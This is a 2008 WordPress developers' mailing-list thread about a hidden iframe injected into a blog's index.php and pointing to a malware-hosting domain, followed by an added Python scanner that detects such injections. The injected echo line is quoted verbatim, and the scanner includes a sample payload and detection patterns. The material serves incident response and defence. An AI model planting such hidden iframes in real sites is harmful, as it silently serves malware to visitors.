[wp-hackers] Re: XSS vuln in wordpress 2.7 ?

Kim Parsell kparsell-wp at kpdesign.net
Mon Dec 22 22:32:26 GMT 2008


madalin - 

I'm going to suggest 2 plugins for you to look into using:

WordPress Exploit Scanner (Donncha O Caoimh):
http://wordpress.org/extend/plugins/exploit-scanner/

postlogger for WordPress:
http://www.village-idiot.org/archives/2008/04/16/postlogger-for-wordpress/

I run postlogger, and it's very interesting the things that it logs that 
regular access logs don't. Not saying it would have caught this 
intruder, but you might find other interesting things going on that 
you're not aware of that you can block.

The Exploit Scanner might let you know if there's a vulnerability in a 
plugin or anywhere else in your WordPress install.

Kim

-------------------------

baker wrote:
> Just to chime in on the fun, you're not the only one as a quick google
> search pulls a lot of people with similar posts.
>
> http://www.networksolutions.com/whois-search/thedeadpit.com
>
> As well shows the (supposed) owner is in Estonia, which oddly enough
> I've seen a lot of failed hack attempts on my site coming from Estonia
> (I think, maybe it was algeria?)
>
> Do you have mod_security enabled? No luck on pulling down the
> offender's IP, and the site itself seems to do nothing but host a
> virus...
>
> Best of luck turning this around...
>
> -kb
>   
>> ------------------------------
>>
>> Message: 7
>> Date: Mon, 22 Dec 2008 20:39:49 +0200
>> From: madalin <niladam at gmail.com>
>> Subject: Re: [wp-hackers] XSS vuln in wordpress 2.7 ?
>> To: wp-hackers at lists.automattic.com
>> Message-ID:
>>        <df809b110812221039y29f116f1k5238dfb209d3f30a at mail.gmail.com>
>> Content-Type: text/plain; charset=UTF-8
>>
>> Yes that's exactly what i am saying. Here is my index.php:
>>
>> <?php
>> /**
>>  * Front to the WordPress application. This file doesn't do anything, but loads
>>  * wp-blog-header.php which does and tells WordPress to load the theme.
>>  *
>>  * @package WordPress
>>  */
>>
>> /**
>>  * Tells WordPress to load the WordPress theme and output it.
>>  *
>>  * @var bool
>>  */
>> define('WP_USE_THEMES', true);
>>
>> /** Loads the WordPress Environment and Template */
>> require('./wp-blog-header.php');
>>
>> // echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>> ?>
>>
>> I've commented the line so I can keep it for future investigations.
>>
>> Our password has NOT been compromised as the only logins are from my
>> host and my friend's host. It could be an older version of a plugin
>> though.
>>
>> However, I had to report this as maybe someone will encounter the same
>> problem or so.
>>
>> Thanks.
>>
>> On Mon, Dec 22, 2008 at 8:36 PM, Stephen Rider
>> <wp-hackers at striderweb.com> wrote:
>>     
>>> Well, wait.  he said:  "i found [it in] my blog's index.php (not theme's
>>> index.php)"
>>>
>>> Does this mean it shows up in the final rendered page, but not in the
>>> theme's file?  In that case, it's being added dynamically.  The link is not
>>> written in the theme.
>>>
>>> Just trying to clarify.  I'm no security guru... (IANASG)
>>>
>>> Stephen
>>>
>>> On Dec 22, 2008, at 11:33 AM, Joost de Valk wrote:
>>>       
>>>> If the file is writable for the webserver and file access is enabled on
>>>> the webserver: yes.
>>>>         
>>>> On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>>>>         
>>>>> Wow. That's nasty, and malicious. Could a plugin do that?
>>>>>
>>>>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>>>>           
>>>>>> For some reason I found my blog's index.php (not theme's index.php)
>>>>>> with the following piece of code right before the ?>
>>>>>>
>>>>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>>>>>
>>>>>> I tried looking at the logs. No luck. The file's permissions look like
>>>>>> this:
>>>>>>
>>>>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50
>>>>>> /home/madalin/www/index.php
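
As an added example (not code from the thread, from WordPress or from the plugins Kim mentions), a small Python scanner that flags the two things madalin saw: a hidden iframe echoed from PHP, and any executable code after the `wp-blog-header.php` require, where a stock WordPress index.php has nothing but `?>`. The sample file and the `attacker.example` domain are constructed for this example.

```python
import re
from typing import Dict, List

# Constructed sample modelled on the index.php posted in the thread: the
# legitimate WordPress bootstrap followed by an appended hidden-iframe echo.
SAMPLE_INDEX_PHP = """<?php
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
echo "<iframe src=\\"http://attacker.example/?click=123\\" width=1 height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>";
?>
"""

IFRAME_RE = re.compile(r'<iframe\b[^>]*>', re.IGNORECASE)
# Markers of an iframe meant not to be seen: CSS hiding or a 0/1 pixel box.
HIDDEN_RE = re.compile(
    r'visibility\s*:\s*hidden|display\s*:\s*none|width=["\']?[01]\b|height=["\']?[01]\b',
    re.IGNORECASE)
# src value, tolerating the \" escaping used inside a PHP double-quoted string.
SRC_RE = re.compile(r'src=\\?["\']?([^"\'\\\s>]+)', re.IGNORECASE)
COMMENT_PREFIXES = ("//", "#", "/*", "*")

def find_hidden_iframes(php_source: str) -> List[Dict]:
    """Return one finding per hidden iframe tag, with line number, src and
    whether the line is commented out (kept for investigation, as in the thread)."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        for match in IFRAME_RE.finditer(line):
            tag = match.group(0)
            if not HIDDEN_RE.search(tag):
                continue
            src = SRC_RE.search(tag)
            findings.append({
                "line": lineno,
                "src": src.group(1) if src else None,
                "commented_out": line.lstrip().startswith(COMMENT_PREFIXES),
            })
    return findings

def code_after_bootstrap(php_source: str) -> List[int]:
    """Line numbers of executable code after the wp-blog-header.php require.
    Anything here is a deviation from the stock index.php worth a look."""
    lines = php_source.splitlines()
    start = next((i for i, l in enumerate(lines) if "wp-blog-header.php" in l), None)
    if start is None:
        return []
    return [i + 1 for i, l in enumerate(lines[start + 1:], start=start + 1)
            if l.strip() and l.strip() != "?>"
            and not l.lstrip().startswith(COMMENT_PREFIXES)]
```

Run over a live install by reading each index.php into `find_hidden_iframes` and `code_after_bootstrap`; a commented-out hit like madalin's is reported with `commented_out` set so it is not mistaken for an active injection.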

